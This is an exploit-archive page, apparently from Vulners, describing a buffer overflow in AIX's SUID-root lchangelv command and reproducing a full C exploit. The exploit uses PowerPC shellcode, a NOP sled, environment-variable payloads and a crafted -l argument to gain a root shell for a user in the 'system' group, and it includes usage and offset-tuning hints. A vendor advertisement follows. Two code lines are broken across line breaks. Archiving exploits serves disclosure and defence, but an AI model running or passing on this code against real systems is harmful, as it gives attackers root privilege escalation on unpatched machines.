IBM AIX lchangelv Buffer Overflow Vulnerability, Requires 'system' group privilege
source: http://www.securityfocus.com/bid/389/info
A buffer overflow can occur in lchangelv under some versions of AIX. Note that an attacker must already have the GID or EGID of 'system' to execute lchangelv.
Because lchangelv is SUID root, this overflow will grant the attacker root privileges.
/*
*
* /usr/sbin/lchangelv (kinda' coded) by BeastMaster V
*
* CREDITS: this is simply a modified version of an exploit
* posted by Georgi Guninski ([email protected])
*
* NOTES: you must have gid or egid of (system) to run this.
*
* USAGE:
* $ cc -o foo -g aix_lchangelv.c
* $ ./foo 5100
* #
*
*
* HINT: Try giving ranges from 5090 through 5500
*
* DISCLAIMER: use this program in a responsible manner.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
extern int execv();
#define MAXBUF 600
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
main(int argc,char **argv,char **env)
{
unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt;
int min=100, max=280;
unsigned int return_address;
char *newenv[8];
char *args[4];
int offset=3200;
if (argc==2) offset = atoi(argv[1]);
pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt;
*((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000f
fff);
*((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000
ffff);
return_address=(unsigned)&buf[0]+offset;
for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82;
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
for(i=0;i<max-1;i++) frame[i]=return_address;
frame[i]=0;
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=NULL;
args[0]="lchangelv";
args[1]="-l";
args[2]=(char*)&frame[0];
execve("/usr/sbin/lchangelv",args,newenv);
perror("Error executing execve \n");
}
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo